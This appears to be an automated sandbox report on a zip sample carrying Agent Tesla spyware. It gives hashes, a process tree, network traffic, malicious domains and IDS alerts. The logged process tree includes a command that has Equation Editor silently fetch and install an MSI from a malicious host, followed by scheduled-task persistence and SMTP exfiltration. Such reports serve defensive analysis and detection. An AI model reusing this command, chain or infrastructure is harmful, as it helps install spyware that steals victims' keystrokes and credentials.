File name: | Sample1.zip |
Full analysis: | https://app.any.run/tasks/c261d626-7870-4b60-90fb-06510bc9fb47 |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
Analysis date: | July 17, 2019, 15:00:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 36CA9A3E3253C409866D609C43DA6C11 |
SHA1: | 24DBB1F7C7D844C7981E334FCCF00578AEC7699D |
SHA256: | 05C73FC0CCB3099D77B39FC7ABF255B12A9BE58B91D0DF16B20542098440BF9B |
SSDEEP: | 12288:pNYh/zAmrTgfnJXyJoQLnl97cUUs427556xHNesoJ3wY4R:pK9BrUfnJXyJfzl9wUUw55sHNDoJ3wfR |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | faf195e07868c79a597306269b2f4fd7eef96257d46a56beb5dd3b7792e200dd.bin |
---|---|
ZipUncompressedSize: | 3128275 |
ZipCompressedSize: | 456612 |
ZipCRC: | 0xfae53e8f |
ZipModifyDate: | 2019:07:17 14:59:28 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0001 |
ZipRequiredVersion: | 788 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3716 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sample1.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3628 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ayy.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1812 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
3912 | cmd.exe & /C CD C: & msiexec.exe /i http://baladefarms.ga/a/kali.msi /qn | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3552 | msiexec.exe /i http://baladefarms.ga/a/kali.msi /qn | C:\Windows\system32\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3736 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2264 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
3556 | "C:\Windows\Installer\MSIB73.tmp" | C:\Windows\Installer\MSIB73.tmp | msiexec.exe | |
User: admin Company: Saab Integrity Level: MEDIUM Description: Platformer Exit code: 0 Version: 1.0.0.0 | ||||
2136 | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AGOkcrwBoew" /XML "C:\Users\admin\AppData\Local\Temp\tmpC942.tmp" | C:\Windows\System32\schtasks.exe | — | MSIB73.tmp |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2948 | "C:\Windows\Installer\MSIB73.tmp" | C:\Windows\Installer\MSIB73.tmp | MSIB73.tmp | |
User: admin Company: Saab Integrity Level: MEDIUM Description: Platformer Version: 1.0.0.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3716 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3716.17274\faf195e07868c79a597306269b2f4fd7eef96257d46a56beb5dd3b7792e200dd.bin | — | |
MD5:— | SHA256:— | |||
3628 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD618.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3736 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DFD2C777E45AD6DDDB.TMP | — | |
MD5:— | SHA256:— | |||
3736 | msiexec.exe | C:\Config.Msi\f0a2a.rbs | — | |
MD5:— | SHA256:— | |||
3736 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF56E92892C7A7FD86.TMP | — | |
MD5:— | SHA256:— | |||
3628 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ayy.doc.LNK | lnk | |
MD5:6232F89C80455E125FE9A425A20CA2C7 | SHA256:BF1DEBB31C32EA1CDB9DDC334F7B5A4C0E850A1F2C1909702189D140DE11EAAA | |||
3628 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1D77B4343C9257A087C48F6ECDD56D1D | SHA256:5A4B1B2C1C4A9C87379FAD1843DBA5EEAF6C9D2C059EA3B4E2E47CC8F3FAAFC3 | |||
3628 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:BF5190F8289D6BF67AD3F1DFC9FFC77C | SHA256:7C4163D0118D50C17F74FBB366E9FDEB063E1DE71C5137F36D4A89468E2C3217 | |||
3628 | WINWORD.EXE | C:\Users\admin\Desktop\~$ayy.doc | pgc | |
MD5:6BEF9D61BC105D4011A1662C078F9DE7 | SHA256:A4941AE925A9920FE618E5AD1DAD2278B00C84C9668DE74627DC4D1677B88EAC | |||
3736 | msiexec.exe | C:\Windows\Installer\MSI5D3.tmp | executable | |
MD5:66DC5CBECDE84CBA63F93ACF04C88CDD | SHA256:F921D0896EF13ACE46F57819AA12A379D54DEFE42B3B338C0BEDBAFD2ACE0F9E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3736 | msiexec.exe | GET | 200 | 198.54.125.61:80 | http://baladefarms.ga/a/kali.msi | US | executable | 1016 Kb | malicious |
2948 | MSIB73.tmp | GET | 200 | 52.6.79.229:80 | http://checkip.amazonaws.com/ | US | text | 14 b | shared |
916 | opera.exe | GET | 200 | 93.184.220.29:80 | http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl | US | der | 528 b | whitelisted |
916 | opera.exe | GET | — | 198.54.125.61:80 | http://baladefarms.ga/a/ | US | — | — | malicious |
916 | opera.exe | GET | 200 | 172.217.18.110:80 | http://clients1.google.com/complete/search?q=bala&client=opera-suggest-omnibox&hl=de | US | text | 111 b | whitelisted |
916 | opera.exe | GET | 200 | 172.217.18.110:80 | http://clients1.google.com/complete/search?q=baladefarms&client=opera-suggest-omnibox&hl=de | US | text | 42 b | whitelisted |
916 | opera.exe | GET | 200 | 172.217.18.110:80 | http://clients1.google.com/complete/search?q=bal&client=opera-suggest-omnibox&hl=de | US | text | 104 b | whitelisted |
916 | opera.exe | GET | 200 | 172.217.18.110:80 | http://clients1.google.com/complete/search?q=balade&client=opera-suggest-omnibox&hl=de | US | text | 107 b | whitelisted |
916 | opera.exe | GET | 200 | 172.217.18.110:80 | http://clients1.google.com/complete/search?q=balad&client=opera-suggest-omnibox&hl=de | US | text | 79 b | whitelisted |
916 | opera.exe | GET | 400 | 185.26.182.112:80 | http://sitecheck2.opera.com/?host=baladefarms.ga&hdn=nP81LKSPtXaS/1zzensL1Q== | unknown | html | 150 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
916 | opera.exe | 185.26.182.94:443 | certs.opera.com | Opera Software AS | — | whitelisted |
916 | opera.exe | 172.217.18.110:80 | clients1.google.com | Google Inc. | US | whitelisted |
2948 | MSIB73.tmp | 52.6.79.229:80 | checkip.amazonaws.com | Amazon.com, Inc. | US | shared |
916 | opera.exe | 198.54.125.61:80 | baladefarms.ga | Namecheap, Inc. | US | malicious |
916 | opera.exe | 93.184.220.29:80 | crl4.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
916 | opera.exe | 185.26.182.112:80 | sitecheck2.opera.com | Opera Software AS | — | malicious |
2948 | MSIB73.tmp | 198.54.125.61:26 | baladefarms.ga | Namecheap, Inc. | US | malicious |
3736 | msiexec.exe | 198.54.125.61:80 | baladefarms.ga | Namecheap, Inc. | US | malicious |
Domain | IP | Reputation |
---|---|---|
baladefarms.ga |
| malicious |
certs.opera.com |
| whitelisted |
crl4.digicert.com |
| whitelisted |
clients1.google.com |
| whitelisted |
checkip.amazonaws.com |
| shared |
sitecheck2.opera.com |
| whitelisted |
mail.sweeddehacklord.us |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .ga Domain |
3736 | msiexec.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Executable application_x-msi Download |
3736 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download |
3736 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable ExeToMSI Download |
2948 | MSIB73.tmp | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla IP Check |
2948 | MSIB73.tmp | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
2948 | MSIB73.tmp | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
2948 | MSIB73.tmp | A Network Trojan was detected | MALWARE [PTsecurity] Trojan-Spy.Keylogger.AgentTesla Exfiltration by SMTP |